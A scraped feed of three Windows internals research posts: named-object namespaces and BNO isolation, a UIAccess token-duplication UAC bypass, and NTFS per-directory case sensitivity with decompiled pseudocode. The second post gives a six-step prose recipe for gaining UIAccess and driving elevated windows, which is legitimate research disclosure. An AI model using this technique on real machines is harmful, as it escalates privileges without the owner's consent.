This global approach hit a problem with the introduction of Terminal Services in Windows 2000 (it was available in NT4 but as an extension). Specifically now you could have multiple "normal" users logged on at the same time on a single system you run the risk of name collisions, making one app impossible to run if another user had already started it and grabbed the name of the event or similar. Not discounting the increased security risk of sharing these resources. To remedy this problem when a new user logs into a Terminal Server a new instance of CSRSS is started and creates a new directory \Session\{ID}\BaseNamedObjects where {ID} maps to the Session identifier, just an integer value.

Due to the way the original Win32 APIs were designed adding a new directory could be made transparent. Instead of mapping the name parameter to the global BNO the KERNEL32 library could look up the session ID and create the session specific name. If the session ID is 0, indicating the physical console and service session, the name is still mapped to the global BNO, anything else is mapped to the per-session directory. It would still be useful for an application to create or open entries to the global BNO, so CSRSS also creates a symbolic link, Global, which maps to the global location. Therefore if you pass the name Global\NAME it will actually create the named object inside the global BNO. There's also a corresponding Local symbolic link, which just maps back to itself. In NtObjectManager you can list the per-session BNO through the SessionNtObject: drive as shown below:

Listing SessionNtObject:\ directory in PowerShell and selecting out symbolic links with the filter "? IsSymbolicLink".

Not much changed in Windows XP, other than Terminal Services being made available in consumer facing versions of the OS. It was used to implement Fast User Switching for example. The next evolution of BNO was in Vista. First Session 0 now became the preserve of system services, instead of being shared with the physical console. All user login sessions placed their named objects in a per-session BNO whether the user connected locally or remotely. The more interesting change was the introduction of private namespaces, exposed through the CreatePrivateNamespace API.

The API allows an application to create their own private BNO. Through the use of a "Boundary Descriptor" it is also possible to share it securely with other application if it has the correct parameters. This private BNO doesn't override the application's BNO, instead the APIs provide a lpAliasPrefix parameter, which you can use to prefix your object names. For example if you create a namespace with the "Flubber" prefix, then you can create or open objects by specify "Flubber\{NAME}" and KERNEL32 will automatically resolve it to the correct location. NtObjectManager exposes private namespaces through the Get-NtDirectory and New-NtDirectory commands with the PrivateNamespaceDescriptor parameter (read the help for more information on its structure). You can also map the private namespace as a drive using New-PSDrive command and specifying a root name of "ntpriv:{BOUNDARY}" where {BOUNDARY} is the boundary descriptor string as shown below:

Creating a new Private Namespace with "New-NtDirectory -PrivateNamespaceDescriptor FLUBBER". Then mapping it as a drive with "New-PSDrive -Name flubber -PSProvider NtObjectManager -Root ntpriv:FLUBBER"

Private namespaces are used in a few locations, such as IE/Edge but on the whole they're not that popular, perhaps because they require explicit changes to code to add the new prefix.

The next step in BNO history was introduced in Windows 8 to support the AppContainer (AC) sandbox. Supporting named objects in a sandbox using built-in functionality is difficult to get right, first because you don't really want a sandboxed application manipulating more privileged application's named objects. Second you also don't want other AC applications manipulating other AC named objects as some sandboxes have more access than others. Avoiding both of these problems made a global BNO location pretty much a non-starter. Instead, MS added code to automatically detect if an application is in an AC sandbox and redirect the named objects transparently to \Sessions\{ID}\AppContainerNamedObjects\{SID}, where SID is the SDDL form of the AC's package SID. The non-sandbox process creates the directory before starting the AC process and is ACL'ed so only that package can modify it. This solves the problem neatly, and again is a testament to the original design of hiding the real underlying object naming from the Win32 API layer.

Listing the AppContainerNamedObjects directory with "ls ntobject:\Sessions\9\AppContainerNamedObjects".

Finally we get to the last part, the area I was RE'ing. Windows 10 RS3 introduced a new undocumented feature, BNO Isolation. When I say it's undocumented I can't find any public reference to it, and the expected definitions don't appear in the Windows SDK headers. Of course there seems to be some structures in the Process Hacker source code for the native format but I try and avoid asking where exactly that's come from ;-)

Anyway, I think the name of the feature pretty much gives away its purpose. It allows a process to create an isolated BNO directory without being in an AC or requiring you to use a private namespace and the accompanying prefix. It's setup by specifying the name of the isolation directory in the  ProcThreadAttributeBnoIsolation Process/Thread attribute when creating a new process. From the Win32 level you only need to specify the name. Internally CreateProcess creates the appropriate BNO directory and supporting symbolic links. At the native level the prefix name and a list handles to capture is passed to NtCreateUserProcess and this information is stored in the process token. KERNEL32 can then query for the isolation prefix using the TokenBnoIsolation information class (which is documented, sort of) when setting up its BNO directory and all named objects are redirected to this new location. I've exposed the BNO prefix in NtObjectManager with the BnoIsolationPrefix property on the token object. You can setup a new process with the BNO isolation by setting the BnoIsolationPrefix property on the Win32Config object. For example:

Creating a new process with a BnoIsolationPrefix value in Win32ProcessConfig. Then listing the new directory under Sessions\9\BaseNamedObjects\Flubber.

The isolated name gets created under the per-session BNO. If you want true isolation you probably want to name the directory with a unique random GUID. Note that the isolation prefix is not inherited across process creation, which is a bit of a shame as that makes it less useful. Still I could see it being a useful feature for running arbitrary applications in a slightly more isolated fashion, shame it's not really documented.

There ends the brief history of BNO in Windows NT. While BNO isolation doesn't immediately look interesting from a security perspective I can imagine it could find some use process isolation and containment.

Accessing Access Tokens for UIAccess

$
0
0
I mentioned in a previous blog post (link) Windows RS5 finally kills the abuse of Access Tokens, as far as I can tell, to elevate to admin by just opening the access token. This is a shame, but personally I didn't care. However, I was contacted on Twitter about some UAC related things, specifically getting UIAccess. I was surprised that people have not been curious enough to put two and two together and realize that the previous token stealing bug can still be used to get you UIAccess even if the direct path to admin has been blocked. This blog post gives a bit of information on why you might care about UIAccess and how you can get your own code running as UIAccess.

TL;DR; you can do the same token stealing trick with UIAccess processes, which doesn't require an elevation prompt, then automate the UI of a privileged process to get a UAC bypass. An example PowerShell script which does this is on my github.

First, what is UIAccess? One of the related features of UAC was User Interface Privilege Isolation (UIPI). UIPI limits the ability of a process interacting with the windows of a higher integrity level process, preventing a malicious application automating a privileged UI to elevate privileges. There's of course some holes which have been discovered over the years but the fundamental principle is sound. However there's a big problem, what about Assistive Technologies? Many people rely on on-screen keyboards, screen readers and the like, they won't work if you can't read and automate the privileged UI. If you're blind does that mean you can't be an administrator? The design Microsoft went with was for a backdoor to UIPI and added a special flag to Access Tokens called UIAccess. When this flag is set most of the UIPI features of WIN32K are relaxed.

From an escalation perspective if you have UIAccess you can automate the windows of a higher integrity process, say an administrator command prompt and use that access to bypass, further, UAC prompts. You can set the UIAccess flag on a token by calling SetTokenInformation and pass the TokenUIAccess information class. If you do that you'll find that you can't set the flag as a normal user, you need SeTcbPrivilege which is typically only granted to SYSTEM. If you need a "God" privilege to set the flag how does UIAccess get set in normal operation?

Use Get-NtToken to get token and checking UIAccess property. Then setting it to true causes an exception requesting a privilege.

You need to get the AppInfo service to spawn your process with an appropriate set of flags or just call ShellExecute. As the service runs as SYSTEM with SeTcbPrivilege is can set the UIAccess flag on start up. While the Consent application will spawn for UIAccess no UAC prompt will show (otherwise what's the point?). The AppInfo service spawns admin UAC processes, however by setting the uiAccess attribute in your manifest to true it'll instead spawn your process as UIAccess. However, it's not that simple, as per this link you also need sign the executable (easy as it can be self-signed) but also the executable must be in a secure location such as System32 or Program Files (harder). To prevent a malicious application spawning a UIAccess process, then injecting code into it, the AppInfo service tweaks the integrity of the token to be High (for split-token admin) or the current integrity plus 16 for normal users. This elevated integrity blocks read/write access to the new process.

Of course there are bugs, for example I found one in 2014, since fixed, in the secure location check by abusing directory NTFS named streams. UACME also has an exploit which abuses  UIAccess (method 32, based on this blog post) if you can find a writable secure location directory or abuse the existing IFileOperation tricks to write a file into the appropriate location. However, for those keeping score the UIAccess is a property of the access token. As the OS doesn't do anything special to clear it you can open the token from an existing UIAccess process, take it's token and create a new process with that token and start automating the heck out of privileged windows ;-)

In summary here's how to exploit this behavior on a completely default install of Windows 10 RS5 and below.
  1. Find or start a UIAccess process, such as the on-screen keyboard (OSK.EXE). As AppInfo doesn't prompt for UIAccess this can be done, relatively, silently.
  2. Open the process for PROCESS_QUERY_LIMITED_INFORMATION access. This is allowed as long as you have any access to the process. This could even be done from a Low integrity process (but not from an AC) although on Windows 10 RS5 some other sandbox mitigations get in the way in the next step, but it should work on Windows 7.
  3. Open the process token for TOKEN_DUPLICATE access and duplicate the token to a new writable primary token.
  4. Set the new token's integrity to match your current token's integrity.
  5. Use the token in CreateProcessAsUser to spawn a new process with the UIAccess flag.
  6. Automate the UI to your heart's desire.
Based on my original blogs you might wonder how I can create a new process with the token when previously I could only impersonate? For UIAccess the AppInfo service just modifies a copy of the caller's token rather than using the linked token. This means the UIAccess token is considered a sibling of any other process on the desktop and so is permitted to assign the primary token as long as the integrity is dropped to be equal or lower than the current integrity.

As an example I've uploaded a PowerShell script which does the attack and uses the SendKeys class to write an arbitrary command to a focused elevated command prompt on the desktop (how you get the command prompt is out of scope).

Screenshot showing the results of the script with notepad run elevated via an elevated command prompt.

There's almost certainly other tricks you can do once you've got UIAccess. For example if the administrator has set the "User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop" group policy then it's possible to disable the secure desktop from a UIAccess process and automate the elevation prompt itself.

In conclusion, while the old admin token stealing trick went away it doesn't mean it doesn't still have value. By abusing UIAccess programs we can almost certainly bypass UAC. Of course as it's not a security boundary and is so full of holes I'm not sure anyone cares about it :-)

NTFS Case Sensitivity on Windows

$
0
0
Back in February 2018 Microsoft released on interesting blog post (link) which introduced per-directory case-sensitive NTFS support. MS have been working on making support for WSL more robust and interop between the Linux and Windows side of things started off a bit rocky. Of special concern was the different semantics between traditional Unix-like file systems and Windows NTFS.

I always keep an eye out for new Windows features which might have security implications and per-directory case sensitivity certainly caught my attention. With 1903 not too far off I thought it was time I actual did a short blog post about per-directory case-sensitivity and mull over some of the security implications. While I'm at it why not go on a whistle-stop tour of case sensitivity in Windows NT over the years.

Disclaimer. I don't currently and have never previously worked for Microsoft so much of what I'm going to discuss is informed speculation.

The Early Years

The Windows NT operating system has had the ability to have case-sensitive files since the very first version. This is because of the OS's well known, but little used, POSIX subsystem. If you look at the documentation for CreateFile you'll notice a flag, FILE_FLAG_POSIX_SEMANTICS which is used for the following purposes:

"Access will occur according to POSIX rules. This includes allowing multiple files with names, differing only in case, for file systems that support that naming."

It's make sense therefore that all you'd need to do to get a case-sensitive file system is use this flag exclusively. Of course being an optional flag it's unlikely that the majority of Windows software will use it correctly. You might wonder what the flag is actually doing, as CreateFile is not a system call. If we dig into the code inside KERNEL32 we'll find the following:

BOOLCreateFileInternal(LPCWSTRlpFileName,...,DWORDdwFlagsAndAttributes){// ... OBJECT_ATTRIBUTESObjectAttributes;if(dwFlagsAndAttributes&FILE_FLAG_POSIX_SEMANTICS){ObjectAttributes.Attributes=0;}else{ObjectAttributes.Attributes=OBJ_CASE_INSENSITIVE;}NtCreateFile(...,&ObjectAttributes,...);}

This code shows that if the FILE_FLAG_POSIX_SEMANTICS flag is set, the the Attributes member of the OBJECT_ATTRIBUTES structure passed to NtCreateFile is initialized to 0. Otherwise it's initialized with the flag OBJ_CASE_INSENSITIVE. The OBJ_CASE_INSENSITIVE instructs the Object Manager to do a case-insensitive lookup for a named kernel object. However files do not directly get parsed by the Object Manager, so the IO manager converts this flag to the IO_STACK_LOCATION flag SL_CASE_SENSITIVE before handing it off to the file system driver in an IRP_MJ_CREATE IRP. The file system driver can then honour that flag or not, in the case of NTFS it honours it and performs a case-sensitive file search instead of the default case-insensitive search.

Aside. Specifying FILE_FLAG_POSIX_SEMANTICS supports one other additional feature of CreateFile that I can see. By specifying FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_POSIX_SEMANTICS  and FILE_ATTRIBUTE_DIRECTORY in the dwFlagsAndAttributes parameter and CREATE_NEW as the dwCreationDisposition parameter the API will create a new directory and return a handle to it. This would normally require calling CreateDirectory, then a second call to open or using the native NtCreateFile system call.

NTFS always supported case-preserving operations, so creating the file AbC.txt will leave the case intact. However when it does an initial check to make sure the file doesn't already exist if you request abc.TXT then NTFS would find it during a case-insensitive search. If the create is done case-sensitive then NTFS won't find the file and you can now create the second file. This allows NTFS to support full case-sensitivity. 

It seems too simple to create files in a case-sensitive manner, just use the FILE_FLAG_POSIX_SEMANTICS flag or don't pass OBJ_CASE_INSENSITIVE to NtCreateFile. Let's try that using PowerShell on a default installation on Windows 10 1809 to see if that's really the case.

Opening the file AbC.txt with OBJ_CASE_INSENSITIVE and without.

First we create a file with the name AbC.txt, as NTFS is case preserving this will be the name assigned to it in the file system. We then open the file first with the OBJ_CASE_INSENSITIVE attribute flag set and specifying the name all in lowercase. As expected we open the file and displaying the name shows the case-preserved form. Next we do the same operation without the OBJ_CASE_INSENSITIVE flag, however unexpectedly it still works. It seems the kernel is just ignoring the missing flag and doing the open case-insensitive. 

It turns out this is by design, as case-insensitive operation is defined as opt-in no one would ever correctly set the flag and the whole edifice of the Windows subsystem would probably quickly fall apart. Therefore honouring enabling support for case-sensitive operation is behind a Session Manager Kernel Registry valueObCaseInsensitive. This registry value is reflected in the global kernel variable, ObpCaseInsensitive which is set to TRUE by default. There's only one place this variable is used, ObpLookupObjectName, which looks like the following:

NTSTATUSObpLookupObjectName(POBJECT_ATTRIBUTESObjectAttributes,...){// ... DWORDAttributes=ObjectAttributes->Attributes;if(ObpCaseInsensitive){Attributes|=OBJ_CASE_INSENSITIVE;}// Continue lookup. }

From this code we can see if ObpCaseInsensitive set to TRUE then regardless of the Attribute flags passed to the lookup operation OBJ_CASE_INSENSITIVE is always set. What this means is no matter what you do you can't perform a case-sensitive lookup operation on a default install of Windows. Of course if you installed the POSIX subsystem you'll typically find the kernel variable set to FALSE which would enable case-sensitive operation for everyone, at least if they forget to set the flags. 

Let's try the same test again with PowerShell but make sure ObpCaseInsensitive is FALSE to see if we now get the expected operation.

Running the same tests but with ObpCaseInsensitive set to FALSE. With OBJ_CASE_INSENSITIVE the file open succeeds, without the flag it fails with an error.

With the OBJ_CASE_INSENSITIVE flag set we can still open the file AbC.txt with the lower case name. However without specifying the flag we we get STATUS_OBJECT_NAME_NOT_FOUND which indicates the lookup operation failed.

Windows Subsystem for Linux

Let's fast forward to the introduction of WSL in Windows 10 1607. WSL needed some way of representing a typical case-sensitive Linux file system. In theory the developers could have implemented it on top of a case-insensitive file system but that'd likely introduce too many compatibility issues. However just disabling ObCaseInsensitive globally would likely introduce their own set of compatibility issues on the Windows side. A compromise was needed to support case-sensitive files on an existing volume.

AsideIt could be argued that Unix-like operating systems (including Linux) don't have a case-sensitive file system at all, but a case-blind file system. Most Unix-like file systems just treat file names on disk as strings of opaque bytes, either the file name matches a sequence of bytes or it doesn't. The file system doesn't really care whether any particular byte is a lower or upper case character. This of course leads to interesting problems such as where two file names which look identical to a user can have different byte representations resulting in unexpected failures to open files. Some file systems such macOS's HFS+ use Unicode Normalization Forms to make file names have a canonical byte representation to make this easier but leads to massive additional complexity, and was infamously removed in the successor APFS.

This compromise can be found back in ObpLookupObjectName as shown below:

NTSTATUSObpLookupObjectName(POBJECT_ATTRIBUTESObjectAttributes,...){// ... DWORDAttributes=ObjectAttributes->Attributes;if(ObpCaseInsensitive&&KeGetCurrentThread()->CrossThreadFlags.ExplicitCaseSensitivity==FALSE){Attributes|=OBJ_CASE_INSENSITIVE;}// Continue lookup. }

In the code we now find that the existing check for ObpCaseInsensitive is augmented with an additional check on the current thread's CrossThreadFlags for the ExplicitCaseSensitivity bit flag. Only if the flag is not set will case-insensitive lookup be forced. This looks like a quick hack to get case-sensitive files without having to change the global behavior. We can find the code which sets this flag in NtSetInformationThread.

NTSTATUSNtSetInformationThread(HANDLEThreadHandle,THREADINFOCLASSThreadInformationClass,PVOIDThreadInformation,ULONGThreadInformationLength){switch(ThreadInformationClass){
caseThreadExplicitCaseSensitivity:if(ThreadInformationLength!=sizeof(DWORD))returnSTATUS_INFO_LENGTH_MISMATCH;DWORDvalue=*((DWORD*)ThreadInformation);if(value){if(!SeSinglePrivilegeCheck(SeDebugPrivilege,PreviousMode))returnSTATUS_PRIVILEGE_NOT_HELD;if(!RtlTestProtectedAccess(Process,0x51))returnSTATUS_ACCESS_DENIED;}if(value)Thread->CrossThreadFlags.ExplicitCaseSensitivity=TRUE;elseThread->CrossThreadFlags.ExplicitCaseSensitivity=FALSE;break;}// ... }

Notice in the code to set the the ExplicitCaseSensitivity flag we need to have both SeDebugPrivilege and be a protected process at level 0x51 which is PPL at Windows signing level. This code is from Windows 10 1809, I'm not sure it was this restrictive previously. However for the purposes of WSL it doesn't matter as all processes are gated by a system service and kernel driver so these checks can be easily bypassed. As any new thread for a WSL process must go via the Pico process driver this flag could be automatically set and everything would just work.

Per-Directory Case-Sensitivity

A per-thread opt-out from case-insensitivity solved the immediate problem, allowing WSL to create case-sensitive files on an existing volume, but it didn't help Windows applications inter-operating with files created by WSL. I'm guessing NTFS makes no guarantees on what file will get opened if performing a case-insensitive lookup when there's multiple files with the same name but with different case. A Windows application could easily get into difficultly trying to open a file and always getting the wrong one. Further work was clearly needed, so introduced in 1803 was the topic at the start of this blog, Per-Directory Case Sensitivity. 

The NTFS driver already handled the case-sensitive lookup operation, therefore why not move the responsibility to enable case sensitive operation to NTFS? There's plenty of spare capacity for a simple bit flag. The blog post I reference at the start suggests using the fsutil command to set case-sensitivity, however of course I want to know how it's done under the hood so I put fsutil from a Windows Insider build into IDA to find out what it was doing. Fortunately changing case-sensitivity is now documented. You pass the FILE_CASE_SENSITIVE_INFORMATION structure with the FILE_CS_FLAG_CASE_SENSITIVE_DIR set via NtSetInformationFile to a directory. with the FileCaseSensitiveInformation information class. We can see the implementation for this in the NTFS driver.

NTSTATUSNtfsSetCaseSensitiveInfo(PIRPIrp,PNTFS_FILE_OBJECTFileObject){if(FileObject->Type!=FILE_DIRECTORY){returnSTATUS_INVALID_PARAMETER;}NSTATUSstatus=NtfsCaseSensitiveInfoAccessCheck(Irp,FileObject);if(NT_ERROR(status))returnstatus;PFILE_CASE_SENSITIVE_INFORMATIONinfo=
(PFILE_CASE_SENSITIVE_INFORMATION)Irp->AssociatedIrp.SystemBuffer;if(info->Flags&FILE_CS_FLAG_CASE_SENSITIVE_DIR){if((g_NtfsEnableDirCaseSensitivity&1)==0)returnSTATUS_NOT_SUPPORTED;if((g_NtfsEnableDirCaseSensitivity&2)&&!NtfsIsFileDeleteable(FileObject)){returnSTATUS_DIRECTORY_NOT_EMPTY;}FileObject->Flags|=0x400;}else{if(NtfsDoesDirHaveCaseDifferingNames(FileObject)){returnSTATUS_CASE_DIFFERING_NAMES_IN_DIR;}FileObject->Flags&=~0x400;}returnSTATUS_SUCCESS;}

There's a bit to unpack here. Firstly you can only apply this to a directory, which makes some sense based on the description of the feature. You also need to pass an access check with the call NtfsCaseSensitiveInfoAccessCheck. We'll skip over that for a second. 

Next we go into the actual setting or unsetting of the flag. Support for Per-Directory Case-Sensitivity is not enabled unless bit 0 is set in the global g_NtfsEnableDirCaseSensitivity variable. This value is loaded from the value NtfsEnableDirCaseSensitivity in HKLM\SYSTEM\CurrentControlSet\Control\FileSystem, the value is set to 0 by default. This means that this feature is not available on a fresh install of Windows 10, almost certainly this value is set when WSL is installed, but I've also found it on the Microsoft app-development VM which I don't believe has WSL installed, so you might find it enabled in unexpected places. The g_NtfsEnableDirCaseSensitivity variable can also have bit 1 set, which indicates that the directory must be empty before changing the case-sensitivity flag (checked with NtfsIsFileDeleteable) however I've not seen that enabled. If those checks pass then the flag 0x400 is set in the NTFS file object.

If the flag is being unset the only check made is whether the directory contains any existing colliding file names. This seems to have been added recently as when I originally tested this feature in an Insider Preview you could disable the flag with conflicting filenames which isn't necessarily sensible behavior.

Going back to the access check, the code for NtfsCaseSensitiveInfoAccessCheck looks like the following:

NTSTATUSNtfsCaseSensitiveInfoAccessCheck(PIRPIrp,PNTFS_FILE_OBJECTFileObject){if(NtfsEffectiveMode(Irp)||FileObject->Access&FILE_WRITE_ATTRIBUTES){PSECURITY_DESCRIPTORSecurityDescriptor;SECURITY_SUBJECT_CONTEXTSubjectContext;SeCaptureSubjectContext(&SubjectContext);NtfsLoadSecurityDescriptor(FileObject,&SecurityDescriptor);if(SeAccessCheck(SecurityDescriptor,&SubjectContextFILE_ADD_FILE|FILE_ADD_SUBDIRECTORY|FILE_DELETE_CHILD)){returnSTATUS_SUCCESS;}}returnSTATUS_ACCESS_DENIED;}

The first check ensures the file handle is opened with FILE_WRITE_ATTRIBUTES access, however that isn't sufficient to enable the flag. The check also ensures that if an access check is performed on the directory's security descriptor that the caller would be granted FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY and FILE_DELETE_CHILD access rights. Presumably this secondary check is to prevent situations where a file handle was shared to another process with less privileges but with FILE_WRITE_ATTRIBUTES rights. 

If the security check is passed and the feature is enabled you can now change the case-sensitivity behavior, and it's even honored by arbitrary Windows applications such as PowerShell or notepad without any changes. Also note that the case-sensitivity flag is inherited by any new directory created under the original.

Showing setting case sensitive on a directory then using Set-Content and Get-Content to interact with the files.

Security Implications of Per-Directory Case-Sensitivity

Let's get on to the thing which interests me most, what's the security implications on this feature? You might not immediately see a problem with this behavior. What it does do is subvert the expectations of normal Windows applications when it comes to the behavior of file name lookup with no way of of detecting its use or mitigating against it. At least with the FILE_FLAG_POSIX_SEMANTICS flag you were only introducing unexpected case-sensitivity if you opted in, but this feature means the NTFS driver doesn't pay any attention to the state of OBJ_CASE_INSENSITIVE when making its lookup decisions. That's great from an interop perspective, but less great from a correctness perspective.

Some of the use cases I could see this being are problem are as follows:
  • TOCTOU where the file name used to open a file has its case modified between a security check and the final operation resulting in the check opening a different file to the final one. 
  • Overriding file lookup in a shared location if the create request's case doesn't the actual case of the file on disk. This would be mitigated if the flag to disable setting case-sensitivity on empty directories was enabled by default.
  • Directory tee'ing, where you replace lookup of an earlier directory in a path based on the state of the case-sensitive flag. This at least is partially mitigated by the check for conflicting file names in a directory, however I've no idea how robust that is.
I found it interesting that this feature also doesn't use RtlIsSandboxToken to check the caller's not in a sandbox. As long as you meet the access check requirements it looks like you can do this from an AppContainer, but its possible I missed something.  On the plus side this feature isn't enabled by default, but I could imagine it getting set accidentally through enterprise imaging or some future application decides it must be on, such as Visual Studio. It's a lot better from a security perspective to not turn on case-sensitivity globally. Also despite my initial interest I've yet to actual find a good use for this behavior, but IMO it's only a matter of time :-)
Viewing all 81 articles
Browse latest View live